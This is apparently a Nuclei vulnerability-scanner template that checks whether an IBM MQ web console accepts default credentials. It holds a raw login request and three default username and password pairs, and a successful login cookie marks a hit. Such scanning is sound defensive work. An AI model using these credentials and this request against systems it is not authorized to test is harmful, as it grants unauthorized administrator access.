id: ibm-mqseries-default-login

info:
  name: IBM MQSeries web console default login
  author: righettod
  severity: high
  description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
  tags: ibm,default-login
  reference:
    - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd
    - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL

requests:
  - raw:
      - |
        POST /ibmmq/console/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/ibmmq/console/login.html

        j_username={{username}}&j_password={{password}}

    attack: pitchfork
    payloads:
      username:
        - admin
        - app
        - mqadmin
      password:
        - passw0rd
        - passw0rd
        - mqadmin

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "LtpaToken2_"

      - type: status
        status:
          - 302